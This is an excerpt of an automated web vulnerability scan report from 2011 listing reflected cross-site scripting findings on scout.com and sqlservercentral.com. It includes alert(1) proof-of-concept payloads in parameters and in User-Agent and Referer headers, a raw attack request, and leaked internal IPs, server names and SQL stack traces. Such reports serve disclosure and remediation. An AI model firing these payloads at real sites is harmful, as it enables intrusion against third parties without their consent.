1.24. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.scout.com
Path:
/staticpages/www/24/wac/a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12d5e(a)a46397c192b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Sat, 15 Oct 2011 17:50:50 GMT Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Oct 2011 18:00:50 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.21898 Vary: Accept-Encoding Content-Length: 2477
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:50:50 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:50:50 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143&12d5e(a)a46397c192b=1 Server IP: 192.168.20.94, SCOUTWEB2 Page Execution Time: 4 ms --> ...[SNIP]...
1.25. http://www.sqlservercentral.com/Forums/Topic1189509-391-1.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sqlservercentral.com
Path:
/Forums/Topic1189509-391-1.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7ac3"><script>alert(1)</script>996d28993fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Forums/Topic1189509-391-1.aspx?d7ac3"><script>alert(1)</script>996d28993fe=1 HTTP/1.1 Host: www.sqlservercentral.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q='%22%3C%2Ftitle%3E%3Cscript+src%22+urchin.js'#q='%22%3C/title%3E%3Cscript+src%22+urchin.js'&hl=en&tbo=1&output=search&source=lnt&tbs=qdr:w&sa=X&ei=VJGYTuXZBLDYiAKFn43CDQ&ved=0CAYQpwUoAw&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=43b88dc4ecfc77e7&biw=1326&bih=890 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the image request parameter is copied into the HTML document as plain text between tags. The payload 86a9e<script>alert(1)</script>238333c352c was submitted in the image parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload eb89d<script>alert(1)</script>ab45e8e8d79 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67fa6"-alert(1)-"8da9de954fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72c8a'-alert(1)-'e71248a12d5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Sat, 15 Oct 2011 17:51:02 GMT Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Oct 2011 18:01:02 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.21898 Vary: Accept-Encoding Content-Length: 2498
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:51:02 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]...
- description : undefined - URL: cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143 - Remote IP : 50.23.123.106 - Referrer URL : http://www.google.com/search?hl=en&q=72c8a'-alert(1)-'e71248a12d5 - Server IP: 192.168.20.95, SCOUTWEB3 - MachineName: SCOUTWEB3 - Stack Trace: at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) at Syst ...[SNIP]...
Report generated by XSS.CX at Fri Oct 28 15:09:54 CDT 2011.